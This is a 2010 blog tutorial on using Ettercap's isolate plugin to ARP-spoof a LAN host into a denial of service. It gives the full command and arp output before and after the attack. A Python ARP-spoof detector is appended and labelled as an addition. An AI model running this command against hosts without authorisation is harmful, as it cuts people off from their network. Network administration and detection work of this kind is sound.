Thursday, November 18, 2010

Isolate IP With Ettercap

Ettercap has a plugin that isolates a network IP address. In effect it causes a denial of service (DoS) against that host. This can be useful for network administrators. For example, unlike Cisco, where you can shut down an interface on a switch, SonicWALL won't let you do such a thing, which can make administration a good deal harder, especially when you have end users running iTunes, torrents, etc.
To start this attack you will need the IP of the host you are isolating. In this case it will be 192.168.2.3. The attack works like this: for every packet the computer sends out, the destination resolves to the computer's own MAC address. Here is the network setup of a Windows box, from ipconfig /all:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : NVIDIA nForce Networking Controller
Physical Address. . . . . . . . . : 00-11-D8-70-48-4F
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Primary WINS Server . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : Thursday, July 24, 2008 11:42:50 AM
Lease Expires . . . . . . . . . . : Thursday, July 24, 2008 11:52:50 AM

Here is the arp -a output:
Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-06-b1-36-1f-24 dynamic

To start the attack we are going to use the isolate plugin and specify the IP that we are attacking. Here is what the command looks like:

#ettercap -i sk0 -P isolate /192.168.2.3/ //

The command will take about 5 minutes to go into effect, since that is how long it takes the ARP cache to refresh. Once it does, this is what the arp -a output should look like:

Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-11-D8-70-48-4F dynamic

As you can see, that isn't the same MAC address that 192.168.2.1 had when we first ran arp -a; the gateway's IP now resolves to the host's own MAC address. If the host tries to reach a web site, ettercap will output something along the lines of this:

TCP 192.168.2.3:80 --> 127.0.0.1:80 | AP
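
The symptom shown above, a gateway ARP entry carrying the host's own physical address, can be checked for automatically on the affected machine. The following Python is an added example, not part of the original post; the function names are hypothetical and the sample text is constructed from the ipconfig and arp -a outputs shown in this post.

```python
import re

# Constructed sample input, modelled on the outputs shown in this post.
IPCONFIG = """\
   Physical Address. . . . . . . . . : 00-11-D8-70-48-4F
   IP Address. . . . . . . . . . . . : 192.168.2.3
   Default Gateway . . . . . . . . . : 192.168.2.1
"""
ARP_BEFORE = """\
Interface: 192.168.2.3 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.1           00-06-b1-36-1f-24     dynamic
"""
# After isolation the gateway entry carries the host's own MAC.
ARP_AFTER = ARP_BEFORE.replace("00-06-b1-36-1f-24", "00-11-D8-70-48-4F")

MAC = r"(?:[0-9A-Fa-f]{2}-){5}[0-9A-Fa-f]{2}"

def norm(mac):
    return mac.lower().replace(":", "-")

def own_macs(ipconfig_text):
    """Local adapter MACs parsed from `ipconfig /all` output."""
    pat = r"Physical Address[ .]*: (" + MAC + ")"
    return {norm(m) for m in re.findall(pat, ipconfig_text)}

def arp_entries(arp_text):
    """(ip, mac, type) tuples parsed from `arp -a` output."""
    pat = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(" + MAC + r")\s+(\w+)", re.M)
    return [(ip, norm(mac), typ) for ip, mac, typ in pat.findall(arp_text)]

def find_isolation(ipconfig_text, arp_text, baseline=None):
    """Flag dynamic entries that map to our own MAC or differ from a known-good {ip: mac}."""
    local = own_macs(ipconfig_text)
    baseline = {ip: norm(m) for ip, m in (baseline or {}).items()}
    findings = []
    for ip, mac, typ in arp_entries(arp_text):
        if typ != "dynamic":  # static entries are not rewritten by ARP replies
            continue
        if mac in local:
            findings.append((ip, mac, "resolves to this host's own MAC"))
        elif ip in baseline and baseline[ip] != mac:
            findings.append((ip, mac, "differs from baseline " + baseline[ip]))
    return findings

if __name__ == "__main__":
    print(find_isolation(IPCONFIG, ARP_AFTER))
```

On a live host, pass the captured text of ipconfig /all and arp -a in place of the constructed samples, and supply a baseline recorded while the network was known to be healthy.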
